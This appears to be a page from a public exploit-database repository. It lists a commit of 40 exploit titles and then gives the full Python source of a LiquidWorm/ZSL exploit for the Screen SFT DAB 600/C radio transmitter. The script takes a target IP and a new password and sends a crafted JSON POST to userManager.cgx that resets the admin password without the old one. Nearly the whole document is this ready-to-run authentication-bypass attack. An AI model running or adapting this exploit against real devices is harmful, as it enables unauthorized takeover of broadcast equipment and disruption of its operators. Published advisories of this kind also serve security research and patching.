0a7adaa3fc
40 changes to exploits/shellcodes/ghdb Optoma 1080PSTX Firmware C02 - Authentication Bypass Screen SFT DAB 600/C - Authentication Bypass Account Creation Screen SFT DAB 600/C - Authentication Bypass Admin Password Change Screen SFT DAB 600/C - Authentication Bypass Erase Account Screen SFT DAB 600/C - Authentication Bypass Password Change Screen SFT DAB 600/C - Authentication Bypass Reset Board Config Screen SFT DAB 600/C - Unauthenticated Information Disclosure (userManager.cgx) PnPSCADA v2.x - Unauthenticated PostgreSQL Injection Gin Markdown Editor v0.7.4 (Electron) - Arbitrary Code Execution Yank Note v3.52.1 (Electron) - Arbitrary Code Execution Apache Superset 2.0.0 - Authentication Bypass FusionInvoice 2023-1.0 - Stored XSS (Cross-Site Scripting) PaperCut NG/MG 22.0.4 - Remote Code Execution (RCE) Affiliate Me Version 5.0.1 - SQL Injection Best POS Management System v1.0 - Unauthenticated Remote Code Execution Bludit CMS v3.14.1 - Stored Cross-Site Scripting (XSS) (Authenticated) ChurchCRM v4.5.4 - Reflected XSS via Image (Authenticated) CiviCRM 5.59.alpha1 - Stored XSS (Cross-Site Scripting) e107 v2.3.2 - Reflected XSS File Thingie 2.5.7 - Remote Code Execution (RCE) GetSimple CMS v3.3.16 - Remote Code Execution (RCE) LeadPro CRM v1.0 - SQL Injection PodcastGenerator 3.2.9 - Multiple Stored Cross-Site Scripting (XSS) Prestashop 8.0.4 - CSV injection Quicklancer v1.0 - SQL Injection SitemagicCMS 4.4.3 - Remote Code Execution (RCE) Smart School v1.0 - SQL Injection Stackposts Social Marketing Tool v1.0 - SQL Injection thrsrossi Millhouse-Project 1.414 - Remote Code Execution TinyWebGallery v2.5 - Remote Code Execution (RCE) WBiz Desk 1.2 - SQL Injection Webkul Qloapps 1.5.2 - Cross-Site Scripting (XSS) WordPress Plugin Backup Migration 1.2.8 - Unauthenticated Database Backup Cameleon CMS 2.7.4 - Persistent Stored XSS in Post Title Hubstaff 1.6.14-61e5e22e - 'wow64log' DLL Search Order Hijacking MobileTrans 4.0.11 - Weak Service Privilege Escalation Trend Micro OfficeScan Client 10.0 - ACL Service LPE eScan Management Console 14.0.1400.2281 - Cross Site Scripting eScan Management Console 14.0.1400.2281 - SQL Injection (Authenticated)
96 lines
No EOL
3.5 KiB
Python
Executable file
96 lines
No EOL
3.5 KiB
Python
Executable file
#!/usr/bin/env python3
|
|
#
|
|
# Exploit Title: Screen SFT DAB 600/C - Authentication Bypass Admin Password Change
|
|
# Exploit Author: LiquidWorm
|
|
#
|
|
#
|
|
# Vendor: DB Elettronica Telecomunicazioni SpA
|
|
# Product web page: https://www.screen.it | https://www.dbbroadcast.com
|
|
# https://www.dbbroadcast.com/products/radio/sft-dab-series-compact-air/
|
|
# Affected version: Firmware: 1.9.3
|
|
# Bios firmware: 7.1 (Apr 19 2021)
|
|
# Gui: 2.46
|
|
# FPGA: 169.55
|
|
# uc: 6.15
|
|
#
|
|
# Summary: Screen's new radio DAB Transmitter is reaching the highest
|
|
# technology level in both Digital Signal Processing and RF domain.
|
|
# SFT DAB Series - Compact Radio DAB Transmitter - Air. Thanks to the
|
|
# digital adaptive precorrection and configuatio flexibility, the Hot
|
|
# Swap System technology, the compactness and the smart system design,
|
|
# the SFT DAB are advanced transmitters. They support standards DAB,
|
|
# DAB+ and T-DMB and are compatible with major headend brands.
|
|
#
|
|
# Desc: This exploit circumvents the control and requirement of admin's
|
|
# old password and directly changes the password.
|
|
#
|
|
# Tested on: Keil-EWEB/2.1
|
|
# MontaVista® Linux® Carrier Grade eXpress (CGX)
|
|
#
|
|
#
|
|
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
|
|
# @zeroscience
|
|
#
|
|
#
|
|
# Advisory ID: ZSL-2023-5774
|
|
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5774.php
|
|
#
|
|
#
|
|
# 19.03.2023
|
|
#
|
|
|
|
import hashlib,datetime##########
|
|
import requests,colorama#########
|
|
from colorama import Fore, Style#
|
|
colorama.init()
|
|
print(Fore.RED+Style.BRIGHT+
|
|
'''
|
|
██████ ███████ ███ ███ ██ ███ ██ ██████ ███████ ██████
|
|
██ ██ ██ ████ ████ ██ ████ ██ ██ ██ ██ ██ ██
|
|
██████ █████ ██ ████ ██ ██ ██ ██ ██ ██ ██ █████ ██████
|
|
██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██
|
|
██ ██ ███████ ██ ██ ██ ██ ████ ██████ ███████ ██ ██
|
|
'''
|
|
+Style.RESET_ALL)
|
|
print(Fore.WHITE+Style.BRIGHT+
|
|
'''
|
|
ZSL and the Producers insist that no one
|
|
submit any exploits of themselfs or others
|
|
performing any dangerous activities.
|
|
We will not open or view them.
|
|
'''
|
|
+Style.RESET_ALL)
|
|
s=datetime.datetime.now()
|
|
s=s.strftime('%d.%m.%Y %H:%M:%S')
|
|
print('Starting API XPL -',s)
|
|
t=input('Enter transmitter ip: ')
|
|
p=input('Enter desired password: ')
|
|
e='/system/api/userManager.cgx'
|
|
m5=hashlib.md5()
|
|
m5.update(p.encode('utf-8'))
|
|
h=m5.hexdigest()
|
|
print('Your sig:',h)
|
|
print('Calling object: ssbtObj')
|
|
print('CGX fastcall: userManager::changeUserPswd')
|
|
t='http://'+t+e
|
|
bh={'Content-Type':'application/x-www-form-urlencoded; charset=UTF-8',
|
|
'Accept':'application/json, text/plain, */*',
|
|
'Accept-Language':'ku-MK,en;q=0.9',
|
|
'Accept-Encoding':'gzip, deflate',
|
|
'User-Agent':'Dabber-+',
|
|
'Connection':'close'}
|
|
j={'ssbtIdx':0,
|
|
'ssbtType':'userManager',
|
|
'ssbtObj':{
|
|
'changeUserPswd':{
|
|
'username':'admin',
|
|
'password':h
|
|
}
|
|
},
|
|
}
|
|
r=requests.post(t,headers=bh,json=j)
|
|
if r.status_code==200:
|
|
print('Done.')
|
|
else:
|
|
print('Error')
|
|
exit(-2) |